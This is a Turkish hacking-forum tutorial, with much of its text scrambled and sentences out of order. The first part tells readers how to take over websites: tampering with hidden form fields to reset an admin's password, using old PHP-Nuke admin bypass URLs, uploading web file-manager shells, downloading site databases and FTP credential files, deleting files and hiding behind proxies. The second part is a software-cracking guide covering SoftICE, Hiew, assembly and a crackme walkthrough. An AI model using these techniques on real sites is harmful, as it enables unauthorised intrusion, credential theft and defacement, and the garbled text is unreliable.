Kafanıza takılanları sorarsanız -ben dahil.perl in yazıp enter’layın.com’a gidip: admin site: siteAdı. Burayı açtıktan sonra Perl hazır hâle geliyor.com Enter’landığında. Bazı arkadaşlar belki anlamamışlardır ama başta da söylediğim gibi anlatılması. açığın nasıl kullanılacağını da kısaca yazalım. Bu bilgiden sonra.. kurban server’ın açıkları kapanmamışsa.) Ama hadi yazayım yine de: MS-DOS Komut İstemini açtığınızda. Burada cd. bilmiyorum.

Öncelikle üyelik sistemli bir siteye üye oluyoruz. dosyayı . <input type="submit" value="Bilgilerimi Güncelle"></form> . mail adresini.. cismini. O zaman.. biz hidden=". sonra type="hidden" name="xxx" value="xxx" yazan yere type="hidden" name="xxx" value="admin’in_nick’i" yazalım.özetlemek istiyorum.. Kaynağı Görüntüle dediğimiz sayfanın kodlarını kopyala/yapıştır’la not defterine atalım ve ilk önce action=".asp dosyası tarafından değiştirilecek. Örneğin..hedeftekisite.. hatta kullanıcı adı ve şifresini bile değiştirebilir. örnekteki hidden’da üzerinde oynama yapılacak kullanıcı adı. <input type="submit" value="Bilgilerimi Güncelle" </form> Bu formda..hedeftekisite. veya type="hidden"’ı type="text" şeklinde değiştirip.asp" method="post"> <input type="hidden" name="islenecekkullaniciadi" value="eski_kullanici_adiniz_burada_yaziyor_olmali"> <br>Kullanıcı adı: <input type="text" name="yenikullaniciadi" value="eski_kullanici_adiniz_burada_da_yaziyor_ama_degist irilebilir"> <br>Şifreniz: <input type="password" name="yenisifre" value="Burada_sifreniz_yaziyor_olmali"> .com/varsa_alt_klasör/ ’u ekleyelim. linkler olur ve bu bölümden kişi kendine ait pek çok bilgisini. action=". Sonra kullanıcı adımızı kullanarak login oluyoruz. ne olur??? Admin’in ismini. Eğer ikinci dediğimi yaparsanız. şifredir çünkü. tekrarlayalım. type="submit" değerinde belirttiğimiz "Bilgilerimi Güncelle" düğmesine basıldığında action’da belirttiğimiz guncelle. İşte "profilimi düzenle" anlamına gelen linke tıklıyoruz ve sonra karşımıza bir form geliyor.com/guncelle. ve password’de de değiştirilebilir şifre yazıyor. . en önemlisi de kullanıcı adı ve de şifresini değiştirebiliriz!.. <input type="hidden" yazan yerdeki kullanıcı adımız. "profil düzenle" vs.. text’te yeni kullanıcı adı.htm formatında kaydedelim. Şimdi. Hemen "kaynağı görüntüle" diyoruz ve karşımıza aşağıdaki gibi bir form kaynak kodu geliyor: <form action="guncelle. type="Password" de ise yine ekrana bir kutucuk çıkar ve bunun içine yazılan herşey **** şeklinde görünür.." kısmında belirtilen dosya form bilgilerini güncelleyecek olan dosyadır...htm uzantılı dosyayı çalıştırdığımızda karşımıza eski nick’imizin olduğu bir kutucuk daha çıkacak.. type="text satırı ekrana bir kutucuk çıkartır ve bu örnekte bizden oraya yeni kullanıcı adımızın girilmesi isteniyor.. oradaki yazıyı silip admin’in nick’ini yazmak yoluyla da bu işi hâlledebiliriz. Çoğu sitede login olduktan sonra "bilgilerimi düzenle". oynama yaptığımızda kod şöyle olacak: <form action="http://www.." daki kısmın başına -eğer yoksahttp://www.asp" method="post"> <input type="hidden" name="islenecekkullaniciadi" value="Sitenin_Admin’inin_kullandigi_nick"> (Veya <input type="text" name="islenecekkullaniciadi" value="adminin_nick’ini_buraya_yaz"> ) <input type="text" name="yenikullaniciadi" value="adminin_nick’i_ne_olacaksa_onu_yazın"> <input type="password" name="yenisifre" value="adminin_sifresi_ne_olacaksa_onu_yazin"> ." bölümüne "administrator"ın sitede kullandığı nick’ini yazarsak.

. ikincisi ise bir yanlışlık yaptınız. meselâ mail adresi. Bunlar.htm dosyasını çalıştırın. çünkü bu siteler "bakın.... zira FTP Kullanıcı adı: deneme şifre: deneme şeklinde hazır bir deneme hostu olabilir server’ın bünyesinde. yani server’da FileSystemObject açığı varsa (tabii ki windows sistemlerde bu açık olabilir. gibi ASP desteği veren Web Sitelerinden kendimize bir hesap.Bilgileri.. sitenin klasör düzeni uygunsuz veya formda ufak bir farklılık var. Önce bu listpath’lerden birini bir bilgisayarın host’una yutturuyoruz.asp gibi. o yüzden şu açığı şu şekilde kapatın" derken. Sonra bir listpath upload ediyoruz ve browser’ın adres kısmına yolunu yazıp çalıştırıyoruz.. Bir PHP-Nuke açığı daha: www. birincisi bu üç-kâğıdın önlemi alınmıştır. Sonrası malum.....com/modules. Birincisi açığını kullanacağınız dillerle ilgili iyi bir bilgi sahibi olmalısınız. * Hedefteki sitenin host firmasından deneme hostu alırız. Bu dosyaları sitenin hosting’ine bir şekilde sızdırırız.. yukarıda belirttiğim şekilde değiştireceksiniz. sadece bu değiştirdiğiniz kullanıcı adı ve şifreyle sitenin üye giriş formunu süslemek ve "gönder"e basmak. Bunun bazı yöntemleri var.hedef.. * Yasak Kelime Kullandınız *.. Zaten anlamış olmanız lâzım. onlar arasında dolaşmamızı ve onlar üzerinde bazı işlemler yapmamızı sağlayan ASP veya PHP dosyalarıdır.com/modules/forums/admin/index.php Nadiren de olsa sizi şifresiz olarak admin paneline sokabilir.. Buraları da kendinize göre uyarlamalısınız. yani bir beleş web sitesi açıyoruz. genelde en altta yazan . Açıklarla hacking’in temel mantığını anlamanız için bu kadar örnek yeterli. ile gösterdiğim yerde çeşitli kutucuklar daha olması lâzım. Neyse. dosya silebilir. Siteye whois çekildiğinde. çok faydalı olabilirler ). ilgili bilgileri girdikten sonra "bilgilerimi güncelle" düğmesine basın ve admin nick ve şifresini değiştirmiş olun! Geriye kalan.me=kullaniciadi Bunu adres bar’ınıza yazacaksınız ve sondaki kullaniciadi yerine Administrator’ın sitede kullandığı nick’i yazacaksınız. server’daki klasör ve dosyaları görmemizi.) Upload ettikten sonra dosyanın yolunu yazar ve çalıştırırız *Yasak Kelime*i. Bir PHP-Nuke Açığı: PHP-Nuke eski versiyonlarında işleyen bir açık: http://www. web sitesi gibi.org. Bu tip açıkları. aynı zamanda açığında ne olduğunu dile getirdiklerinden. meselâ Cyber-security.php?na. olympos. Tüm bunları yaptıktan sonra kaydettiğimiz ve üzerinde oynamalar yaptığımız .. Bir başka hack yöntemi ise Listpath kullanmaktır. İşte birkaçı: * Brinkster.. Bu arada benim örnekte .com gibi "Ben güvenlik portalıyım" diyen yerlerden öğrenebilirsiniz... Bazen gerek bile olmayabilir. google’da inurl:upload filetype:asp gibi çeşitli aramalarla ASP dosyalarını upload’a izin veren yerlere listpath’’in adını değiştirerek upload edebiliriz (örneğin test. linux’ta başka isimler alır bu açık).. bunun iki sebebi olabilir. böyle böyle bir açık var. Eğer hosting bilgisayarında.yaratıcılığınızı kullanacaksınız ve üçüncüsü ise en yeni açıkları takip edeceksiniz.org. * Bazı sitelerde upload özelliği vardır.hedef. Belki tutar. içeriklerini değiştirebilirsiniz. securityfocus. Ben sadece örnek verdiğim için burada uzatmayacağım. Bu yöntemin çalışmama ihtimali var. Dikkat çekmemesi için.. veya diğer listpath programcıklarını.. bunu kapatmazsanız şöyle-böyle olur. Bu ikinci nedeni HTML bilen arkadaşlar kolaylıkla atlatabilirler.. eski PHP-Nuke sürümlerinde.. Websamba vs.org. ikincisi bildiklerinizi küçümsemeden -lamerlik-mamerlik demeden.

ns1. Tekrar söylüyorum. herkesin yapabileceği.. öğrendiklerinizi pratiğe dökmek için çalışmanız çok önemli. tam anlamıyla kendinize "hacker" diyebilin. Eğer burada yoksa diğer dizinleri de deneyebilirsiniz. sürücülere ulaşmak için düğmeler bulunur ve dosyaları silip değiştirmek.ini dosyasını da download edip FTP kullanıcı adı ve şifrelerine de ulaşabiliriz. ama en azından isim vereyim. Bu da aklınızda bulunsun. O zaman size düşen. sonra da paşa paşa çalıştırıp host’ta cirit atarsınız.. C Dili. Bazı Listpath’lerde (meselâ *Yasak Kelime*liŞeker’de). Kullanımları aslında listpath’ten listpath’e değişir ama genelde klasörler arasında dolaşabilmek için linkler bulunur. ve 2. . MDB dosyalarını silerseniz siteyi çalışmaz hâle getirrirsiniz. Bozarsınız yani. Yoksa anlatılan bir çok şeyi anlayamamanız kuvvetle muhtemel. PHP. MDB’leri ille de download etmek zorunda değilsiniz... yönetimden izin almaya vaktim olmadı. c rogram filesserv-userv-u. Bunun dışında.. ASP.com şeklindeki yerler hosting şirketinin sitesini verir.. Şimdi de birkaç bilgi vereyim yine bu konuyla ilgili. Ama elinizi mümkün olduğunca çabuk tutun ve mümkünse Proxy kullanarak IP’nizi gizleyin. Hack’lemeyi plânladığınız bir sitenin dosyalarını silmeyi ve kendi dosyanızı upload etmeyi deneyin. ns2. Eğer olmazsa. Bundan sonrası sizin öğrendiklerinizi misyonumuz dahilinde -kesinlikle küçümsemeden. Bunun dışında PHP destekleyen server’lar için yapılmış listpath’lerde var. üzerine ap-ayrı. Eğer bir yere ASP listpath’i yüklerseniz inetpub klasörüne ve oradan da wwwroot klasörüne gitmelisiniz. MDB dosyalarını bulmak.xxx. Anlamadıklarınızı sormanız hâlinde size yardım edecek çok fazla insan var burada. SQL. başlı başına dökümanlar yazılabilecek uzun ve yeniler için anlaşılması zor konular. Aslında en iyi ve zevkli hack yöntemi bu tip listpath programlarını kullanmaktır bence. Şöyle bir göz gezdirerek. (hatta *Yasak Kelime*li şekerde download etmek) için linkler bulunabilir.com . (ASP destekli olmak zorunda) Bu gibi yöntemlerle listpath’i upload ettikten sonra. Bunlardan sonrası ise. CGI.xxx.. bir konu üzerinde uzmanlık ve fazlaca bilgi gerektirmeyen hacking yöntemleri kısaca bunlar. Eski konularda MDB’lerle ne yapabileceğinizi anlatmıştım.. yolunu yazarak çalıştırabiliriz. remView isimli bir PHP listpath var. bölüme geri dönüp hatırlayabilirsiniz. o server’da FileSystemObject açığı yok demektir. Kıymetini bilin reshack´ın. daha fazla ilerlemek için en azından JavaScript. Unix/Linux. Ama bilgisayar ve hacking konusunda ilerlemek isteyenlerin yukarıda saydığım konuların yanısıra programlama ile ilgili bilgi sahibi olması lazım bilmem anlatabildim mi . Buradan 1 aylık deneme hostu alır ve listPath’i yüklersiniz. bunları artık siz listpath’ten öğrenebilirsiniz..pratiğe dökmenize ve yukarıda saydığım konular hakkında bilgi toplamaya başlamanıza kalmış. CW bu konuda size önemli bir kaynaklık teşkil edecektir.. isterseniz 1. gibi konularda en azından temel bilginiz olması gerekiyor ki.. Evet arkadaşlar. Genellikle burada tutulur sitelerin dosyaları.. Ve bunun dışında. Şunu da söyleyeyim. PERL. Ya da para verip bir host alırsınız. Bu yöntemlerle de çok şeyler yapabilirsiniz aslına bakarsanız... dosya arama kutuları bulunur. HTML zaten bilmek zorundasınız .. neyin ne olduğunu anlarsınız zaten... her ihtimale karşı. Bu dökümanda size herkezin uygulayabileceği başlıca hacking yöntemlerini anlatmaya çalıştım ve mantığı kavratmak için bu kadar şey yazdım.. ASP için *Yasak Kelime*li Şeker gibi Listpath’leri kullanabilirsiniz -ki en iyi ASP listpath’tir diyebilirim-. Burada link veremiyorum. Buralara mdb yazın ve çıkan dosyaları indirin.. Eğer böyle bir şey yoksa sitenin klasörlerini karıştırmalısınız.

dongle adı verilen donanımlarla korunan programlar için ise iyi derecede assembly dilini bilmeniz lazımdır. yani ilk programlar 0 ve 1 sayılarıyla yazılıyordu.Windows u iyi derecede bilmek 3.com da programın crackini bulabilrisiniz. Programların linklerini vermiyorum siz google de bulabilirsiniz eğer bulamayacak kadar bilgisayarda bilgisizseniz bu iştende vazgeçmelisiniz. Program Nasıl Kırılır Eğer amacınız programları ücretsiz veya sınrısız kullanmak ise bu zorlu işe girmenize hiç gerek yok www. İlk programcılar makine dili komutları ile programları yazmaktaydılar. ve bu sayılarla assembly dili geliştirildi assembly dili ile işlemlerin ingilizce karşılıklarının kısaltmalarından oluşuyordu.Assembly dilini bilmek 3.Gerekli programlara sahip olmak Gerekli Programlar En önemlisi debug programı olan softice.Sabır 2.astalavista. Program kırabilmek için programcılıktan da anlamanız gerekiyor.Cracking nedir cracking kısa olarak program kırma da denilebilir. Assembly nedir Assembly bir programlama dilidir. SoftIce Kullanma klavuzu alıntıdır ---------------------------------------------------------------------------------------------------SofICE Kurulumu SoftICE ı iyi bir şekilde kurup ayarlamazsanız gerekli verimi alamazsınız. Programları en basitinden debug programlarıyla kırılır bu programlarla kırmak istediğiniz programın o anda yaptığı ilşlemleri takip edersiniz dolayısıyla şifre yanlış hatası verdiği anı takip ettiğinizde şifre ye ulaşabilir veya şifrenin algortimasını çözebilirsiniz Program Kırmak için gerekenler 1. Makina dili işlemciye veri bitlerinin hexdecimal sayı sisteminde gösterilmesiyle oluşmuş bir dildir. Örneğin Visual Basic programları için SmartCheck Delphi programları için Dede vb. Program kırabilmek için assembly dilini bilmeniz lazımdır. disassembler programı Windasm. Hex editör programı Hiew (Hackers View) bunlardan başka işinizi kolaylıştıracak ekstra programlar da var. Bu dil ilk bilgisayarcıların keşfettiği bir dildir.Kurulum ekranında önemli olan 3 nokta var Video Adapter Mouse Video . Fakat cracker olmak istiyorsanız başlayabilirsiniz.

[MENU] MENUITEM NORM.Winice.Bu yüzden programı kurduktan sonra winice.datı değiştirip öyle restart atın SoftICE Komutları SoftICE kurmamıza rağmen etkili bir şekilde kullanmayı öğrenmek o kadar kolay .İlk olarak bir boot menüsü oluşturalım böylelikle windows her açıldığında bize SofICE ile açılıp açılmıycağını sorsun. !!!!Sizin config.EXE REM SoftICE olmadan baslangic :NORM Rem ----Buradan kesin-----Config.Eğer başa eklerseniz sorun yapar.Yanlış mouse u seçerseniz SoftICE sapıtabilir o yüzden dikkatli olun.Autoexec.Bu ayarları yanlış yaparsanız SoftICE ı kullanmanız mümkün olmıyabilir.dat dosyasını download edin ve SoftICE ın kurulu olduğu klasöre kopyalayın.!!! Rem -----Buradan itibaren kopyalayın------goto %config% REM Load SoftICE .bat dosyanızın sonuna bu satırları ekleyin. Eğer işletim sisteminiz WinME ise http://icedump.Daha sonra Test tuşu ile çalışıp çalışmadığınız kontrol edin.Eğer başa eklerseniz sorun yapar.sys dosya örneği.Windows 98 MENUITEM SICE. Autoexec.SoftICE in kurulu oldugu yer onemli !! :SICE C:\PROGRA~1\NUMEGA\SOFTIC~1\WINICE.sys dosyanızın sonuna bu satırları ekleyin.Bu ayarlara çok dikat edin.sys dosyalarını aşağıdaki gibi değiştirin.Eğer ekran kartınız listede yoksa yahut ilerde problem yaşarsanız ekran kartı olarak "Universal Video Driver" seçeneğini seçin. Mouse Mouse unuzun tipi neyse ona uygun mouseu seçin.5 [NORM] [SICE] Rem ----Buradan kesin-----Benim kullandığım winice.bat ve config.Ekran kartı ayarları SoftICE'ın çalışması için çok gereklidir. !!!!Sizin autoexec. SoftICE'ın Ayarlanması SofICE i iyi ayarlıyamazsanız programdan faydalanamazsınız.SoftICE ile Windows 98 MENUDEFAULT NORM.dat 'a yaptığınız her değişikliğin etkili olabilmesi için yeniden windowsun başlatılması lazım.******** adresinden wmloaderı indirin ve readme dosyası okuyun.bat dosya örneği.İlk olarak ekran kartnız listede varsa onu seçin.!!! Rem -----Buradan itibaren kopyalayın------REM Menüyü olustur.

( ? 23 # gibi) SoftICE Problemleri Bu problemlerin %90 ı winice. .winice. bpx = SoftICE a belli api kodlarında dur emri bpm = SoftICE a belli bellek bölgelerinde dur emri bpr = Belli hafıza bölegelerinde dur emri d = Belleği ve orada yazan değerleri göster e = Bellekteki değerleri değiştirir cls = Input penceresini temizle. lines 60. altscr off.Kernel32. kapatılan 0 nolu breakpointi açar) ? = Belli bir register veya sayının değerini gösterir.Alttaki pencere bizim komutları yazdığımız input penceresi.R tuşuna basın ve daha sonra faults off yazın. 3.Kullana kullana sizde bir şeyler öğreneceksiniz.ALTKEY ALT Z. 1. bpr 0157:00643345 0157:00643345 iki yer arasında bir yere erişildiği zaman dur komutunu verir d 00456787 o bölgedeki bellekteki değerleri gösterir.dat dosyasında bulunmuyor demektir.. i kaldırın.X. wd 8." . x = SoftICE dan çık.değildir.dat dosyasının INIT kısmını şu şekilde değiştirin INIT="code on. Bazen SoftICE a kendiliğinden geçiyor ve bir daha geriye dönemiyorum. Ctrl+D kombinasyonunu Alt+Z şeklinde nasıl değiştirebilirim. 2.dll user32.dat dosyasını download edip SoftICE ı kurduğunuz klasöre kopyalayın.Bazı komutalar şöyle. . Uyarı: Problemlerinize geçmeden önce lütfen winice. . Birde input penceresinde kullandığımız komutalardan da bahsedelim.Bu bütün programları durduracak ve sizi SoftICE ekranına götürecetir.dll vs yi winice.Breakpoint koyduğunuz dll winice.dat dosyasında bulun ve o satırın en başındaki . SoftICE a geçiyorum breakpoint koyunca symbol not defined diyor.dat dosyasını düzenlemediğiniz için olmaktadır. SoftICE a geçince bir kaç pencere ve değişik bilgiler göreceksiniz. bl = O andaki breakpointleri gösterir((00) BPX #0028:09876543 C=01 gibi) bc = O anda konulmuş break pointleri temizler (bc 1 bir nolu breakpointi siler.) bd = Break pointi kapatir(bd 0 0 nolu breakpointi kapatır) be = Break pointi açar (be 0. faults off. wc 32. s 0 l ffffffff 'text'= Hafızada text yazısını arar Örnek vermek gerekirse bpx getdlgitemtexta SoftICE a bu api kodunu görünce dur komutunu verir bpm 0157:0009AC2D SoftICE a o belleğe erişildiği zaman dur komutunu verir. d eax eax registerinin belirttiği yerdeki belleği gösterir.Fakat burada SoftICE 'ın nasıl kullanıldığına dair bir kaç örnek verelim SoftICE a geçmek için Ctrl ve D tuşuna aynı anda basın.

Call'ın yapıldığı adres.Bu yüzden mouse un senkronizasyonu bozuluyor.dat ı açın ve VERBOSE=OFF satırını ekleyin..Bu soruyu biraz açıklıyarak cevap vermek istiyorum bunu iyi anlarsanız çok işinize yarar. [ESP+18h] .Buda mouse u eski haline getirecektir.Yahut dd esp+8 yazarsak hangi anahtarın çağrıldığını bulabiliriz. 6. Bazen SoftICE girdiğim zaman mouse deli gibi oynamaya başlıyor. 5." 7. // saklı LPDWORD lpdwType..lpcbData [ESP+14h] . Eğer bu olay windows ortamına geçtiğinizde olursa Ctrl+Alt+Del tuşlarına bir kez tıklayın Task Manager geldiğinde hemen Esc ile çıkın.4.lpData &lt. INIT="command1.Hiç bir şey yapamıyorum.lpType [ESP+0Ch] . Alınıcak olan değerin ismi.Init kısmına eklenen komutlar . Bu fonksiyon stdcall şeklinde bir fonksiyon yani parametreler en sondan başlayarak push ediliyor. . // alınıcak değerinin isminin olduğu adres LPDWORD lpdwReserved.Yahut loader32.X komutu SoftICE dan çık demek oldupundan eğer X.commandn. SoftICE bir sürü loading unloading vs mesajları gösteriyor bunu nasıl kapatabilirim .lpReserved [ESP+08h] . Bir program HKLM\Software\DandikSoft\Serial diye bir keyi okuyor.X. // fonksiyon sonucunun adresi LPDWORD lpcbData // fonksiyon sonuc adresinin büyüklüğü ). olmalıdır..return EIP &lt.Şimdi ilk olarak RegqueryValueexa fonkisyonu ne işe yarar ve hangi parametreler yollanır ona bir bakalım. // çağrılacak keyin handle ı LPTSTR lpszValueName.&lt.win32. [ESP+10h] .Şimdi bizim istediğimiz sadece bir keyden okunduğu zaman durdurmak. Init kısmına eklediğim komutlar çalışmıyor. .&lt.winice..Edit/SoftICE initializing settings den "Disable diagnostic messages" ı seçin.Siz bu breakpointi koyup SoftICE geçtiğiniz zaman ESP şu şekilde olacaktır .exe yi açın.Ben bpx regqueryvalueexa şeklinde breakpoint koyuyorum ama SoftICE yüzlerce kez duruyor.Kısacası init kısmı şöyle olmalıdır.lpValueName &lt.Bu olay bazen SoftICE dan çıktığım zamanda oluyor..wc.Sadece belli keye ulaşıldığı zaman nasıl durdurabilirim.Bu olay mouse işlem yaparken SoftICE a geçildiği zaman oluyor. [ESP+04h] . Buraya fonksiyonun sonucu geliyor. .hKey [ESP+00h] .wd lines değerlerini değiştirerek bunu yapabilirsiniz. ile birbirinden ayrılmalı ve en sonunda X.command2.Aşağıdaki breakpoint işimiz görecektir. . // değer tipinin adresi LPBYTE lpbData. den sonra komut eklerseniz bunlar çalışmıycaktır.hlp dosyasını açıyoruz ve şunu görüyoruz LONG RegQueryValueEx( HKEY hKey. . 8.Bunu düzeltemek için bir kaç kez Ctrl+M tuşuna basın. Ekran boyutunu nasıl değiştirebilirim.&lt.Bir kaç kez bastıktan sonra mouse eski haline dönecektir.. Yani SoftICE durduğu zaman biz dd esp+14 yazarsak fonksiyonun sonucunun nereye yazıldığını görürüz.

E modunda XOR F9 A/H/T modda dosya açar. Bu şekilde macroları geliştirebilirsiniz.8) == 'Seri' DO "D ESP-&gt. E modda dosyayı günceller F10 A/H/T modunda programdan çıkar Alt-P Ekranı bir dosya olarak saklar.BPX RegQueryValueExA IF *(ESP-&gt.com a girip adres satırını adidascrack.14\"" %1 demek macroya gönderilen parametre demek \ işaretlerini eklememizin sebebi SoftICE.Bu makroyu winice.Unutmamanız gerek fonksiyona gönderilen parametreler ve bunları ESP de göründüğü durum.*********.Her bir parametre bir dword da oluyor. " işaretlerini macro bitişi kabul ettiği için biz \ işareti ile " ları yok saydırıyoruz.*********.dat dosyasına ekliyebilirsiniz eğer ekli değilse MACRO bpreg="bpx regqueryvalueexa if*(esp-&gt.dat dosyasını adidascrack. F8 A/H modunda header.Bu şekilde yazmak uzun olabilir o yüzden macro ile bu işi halletmek en güzeli.zip burdan indirebilirsiniz (eğer indirmede sorun yaşarsanız www.Yani sadece ilk dworda erişme şansımız var. T modunda XLAT.mynet.Mesela bunu getwindowtexta veya getdlgıtemtexta ya uygulayıp sadece sizin isminiz istendiğinde SoftICE a geçmek vs . E modunda crypt eder.com/winice.8)=='%1' do \"d esp-&gt. Do d esp-&gt.Bildiğiniz üzere push edilenler dword olduğu için yani 4 byte biz sadece 4 haneyi okuyabiliyoruz.Eğer esp+8 in gösterdiği yerde Seri yazıyorsa.14." Eğer program Seri ile başlayan bir keyden bir şey okursa dur. --------------------------------------------------------------------------------------------------------------------------------------Winice. Hiew Kullanmak Klavuzu F1 Dosya hakkında bilgiler verir F2 Marj ayarlaması yapar/ayarı kaldırır F3 Dosyayı A/H/T moduna dönüştürür F4 Modu belirler F5 Verilen adrese gider (A/H modu için) F6 Linefeed.8) demek esp+8 in gösterdiği yerdeki içerik demek. Umarım bu ipuçları size faydalı olur. F7 A/H/T modunda arama yapar. satır ayarlaması yapar. Alt-R Dosyayı yeniden yükler.İsterseniz bu nasıl oluyor bir bakalım *(ESP-&gt. eğer Serial keyine ulaşıldığında durmasını istiyorsanız SoftICE da iken artık sadece şunu yazmanız yeterli olucak bpreg Seri Dikkat edin sadece ve sadece ilk dört karakteri giriyorsunuz. Ctrl-F3 Bul/değiştir .zip yazın.com/winice.14 de esp+14 bölgesi yani sonucun alındığı bölgeyi göster demek.

burada sadece eax.ebx eax'e kopyalanır.ile program bu 415265 adresine yönlendirilir. ecx . değilse program olduğu yerden devam edecektir. ecx . cmp eax. jmp 00415265 . Şartsız dallanma komutudur. jmp komutu. Öncesinde ise genelde yukarıda gösterilen cmp ile iki değer karşılaştırılmıştır.bu komuttan sonra eax=8 olacaktır. Karşılaştırma komutudur. Bu komut registerlere değer atamak için kullanılır. Burayı atlamak için ise je. cmp komutu. cmp eax. mov eax. Arkasından da sonuca göre ya devam edilir. Program başka bir satıra yönlendirilir.Ctrl-F7 Aynı kritere göre sonrakini ara Ctrl-F8 Önceki dosyaya geçer Ctrl-F9 Sonraki dosyaya geçer + Satır işaretler (Bookmark) Alt-(1. mov komutu.8) İşaretlenen satıra gider Alt-. ecx je 00415265 . mov eax. cmp eax. Herhangi bir dallanma yok. jz komutları kullanılmaktadır. yada başka bir kısma atlanır. Karşılatırma sonucu eşit değil ise belirtilen adrese zıplanır.. 8 .eax değeri ile ecx değeri birbirine eşit ise 415265 adresine zıplanır. je komutu. bunları bilmeden hareket edemeyiz. jne komutu.Geçerli bookmarkı siler Assembly Dili Hakkında Bilgi Assembly Dili Hakkında Biraz Bilgi Kullanılan belli başlı assembly komutlarını basitçe açıklamaya çalıştım. ebx . Karşılaştırma sonucu eşit ise belirtilen adrese zıplanır. ecx ile karşılaştırılmaktadır.

tekrar çağırmak için ise pop komutunu kullanırız. bu procedur işlenir ve tekrar döner. pop eax . yani bir süre saklayabiliriz. bpx getwindowtexta : Yukarıdaki breakpointin alternatifi. Breakpointler bpx getdlgitemtexta : Sizin girdiğiniz değerler kontrol edilecekse kullanılabilir. 5 . call komut satırının altındaki adresten devam eder. inc eax . push-pop komutları. böyle zamanlarda kullanılır. bpx hmemcpy : Visual basic ile yazılmış programlarda yukarıdakiler işe yaramaz. Toplama komutudur. eax tekrar çağırılır. call 00415265 . dec komutu.eax değeri ecx değerine eşit değil ise 415265 adresine zıplanır.eax değeri bu komut sonrası eax-1 olacaktır. bpx messageboxa : Programların verdiği bazı hata mesajlarını yada nag ekranlarını bununla yakalayabiliriz. Bazı değerler tekrar lazım olacaklar ise bunları stack' a atabiliriz. Devamındaki registerin değerini 1 arttırır. ebx .eax yerine ebx değeride eklenerek eax'e yazılır.eax yığına atılır. call. Devamındaki registerin değerini 1 azaltır.Buradaki komut dizisi işlenir ve ret komutunun kullanıldığı yerde program tekrar döner.jne 00415265 . program 00415265 adresine gider. add komutu.ret komutları. push eax .eax değeri eax+5 olacaktır. call komutunun kullanıldığı yerde program belirtilen adrese gider ve burası procedur diye adlandırılır. dec eax . inc komutu.eax değeri bu komut sonrası eax+1 olacaktır. add eax. add eax. . Bunun için push komutunu kullanırız.

Tabiki bu HEX'de oluyor. bpx readfilea : Dosya kontrolü için diğer alternatif. 2 = 32. Programı açtık.EDX 017F:00401077 01CE ADD ESI.8 karakterlik bir serial girip girmediğinizi kontrol eder.ilk karakteri CL'nin içine taşır 017F:0040106D 8A5701 MOV DL.com/1. Şimidi breakpoint koyalım (GetDlgItemTextA) ve softice'dan çıkalım(X yazıp enterlayabilirsiniz.[EDI+01] &lt. programı adidascrack.ECX Şimdi 00401056 daki olayı anlamış olmanız lazım.-----. Şimdi kodları F10 ile . Hooop SoftIce geldi.yazıyı EDI'ye taşır 017F:00401065 33C9 XOR ECX.08 &lt.Ve PassMe'de Chack diyelim. Softice kontrolu içinde kullanılmaktadır.EDX 017F:00401069 33F6 XOR ESI. 3=33 gibi. Program ilk 4haneyi son 4 haneye ekliyor.00 &lt.bpx getsystemtime : Zaman kontrolü yapıldığı durumlarda kullanılır.--.-----. Ctrl-D yaptık ve SoftIce açıldı.ikinci karakteri 'nin içine taşırn DL 017F:00401070 80FA00 CMP DL. İlk Programın kırılması İlk Program Kırma Şimdi Yeni Başlayanlar için basit bir crack ı anlatalım. Çünkü burada yazdığımız serialin 8 karakter olup olmadığını kontro edecek.zip den indirin Artık crackme'yi kırmaya başlayabiliriz.ESI 017F:0040106B 8A0F MOV CL.ECX 017F:00401079 83C702 ADD EDI.--------. winice. Bir kere F11'e basın ve calldan çıkıp aşağıya gelin: 017F:00401056 FF15701D4000 CALL [USER32!GetDlgItemTextA] 017F:0040105C 3C08 CMP AL.*********.). bpx regqueryvalueexa : Register kontrolü için kullanılmaktadır.evetse. bpx getlocaltime : Zaman kontrolü için diğer alternatif. sallama seriali girdik.yazının ulaşıp ulaşmadığını kontrol eder 017F:00401073 7409 JZ 0040107E &lt. jump(atla) 017F:00401075 01D1 ADD ECX. Hex'de 1 = 31.004011C2 &lt. bpx createfilea : Dosya kontrolü yapıldığında crc sınamalarında kullanılabilir.02 017F:0040107C EBED JMP 0040106B 017F:0040107E 01CE ADD ESI.dat dosyasını softice yi kurduğunuz klasöre kopyalamazsanız softice brakpointeri koyarken hata alırsınız.-. 017F:0040105E 7590 JNZ 00400FF0 017F:00401060 BFC2114000 MOV EDI.------.[EDI] &lt.ECX 017F:00401067 33D2 XOR EDX.

Good cracker 0167:004010A4 EB2E JMP 004010D4 .... Satır 0167:0040109E 'da EAX ECX 'e eklenmiş.00401300 0167:00401097 33C0 XOR EAX.[EDI] 0167:0040109B 8B4F04 MOV ECX.org/issdata... ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄPROT32Ä 0167:00401092 BF00134000 MOV EDI...htm burdan bula bilirsiniz burda ki her uzantıyı arama yaparken kulana bliirisniz..zip http://www. 016F:00401314 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ...ESI 0167:004010A2 7402 JZ 004010A6 ."........"..! pass3:-$-!. Şunları deneyin: pass1:-!-!.."-#-# pass6:-#..sitemynet." pass5:..1234 016F:00401304 35 36 37 38 00 00 00 00-00 00 00 00 00 00 00 00 5678.trace edip şağıya gelince daha iyi anlayacaksınız...e-bilisim.[EDI+04] 0167:0040109B 8B4F04 MOV ECX. Ama eğer eşit değilse yeniden dene. Ve sonra ESI (455B455B) değerinde bunlar karşılaştırılır. EAX=34333231 EBX=0063FC34 ECX=38373635 EDX=00000000 ESI=455B455B EDI=00401300 EBP=0063FBE0 ESP=0063FBE0 EIP=0040109E o d I s Z a P c CS=0167 DS=016F SS=016F ES=016F FS=12E7 GS=0000 ÄÄÄÄÄPASSME!+12F4ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ byteÄÄÄÄÄÄÄÄÄÄÄÄÄÄPROTÄÄÄ(0)ÄÄ 016F:004012F4 00 00 00 00 00 00 00 00-00 00 00 00 31 32 33 34 .!.... "filetype:asp"de asp destekli serverlar yada asp dosyaları bulunan siteleri armamızı saglar..Bad cracker ECX registeri "5678" (35363738) değerini tutuyor.........org/sitebulma.EAX 0167:00401099 8B07 MOV EAX..!...$.. Yazar bu programında değişik bir algoritma kullanmış ve ilk dört karakter ile son dört karakteri yer değiştirmiş.ECX --&gt.". Eğer eşitseler: satır 004010A6 'a atlar Bu iyi 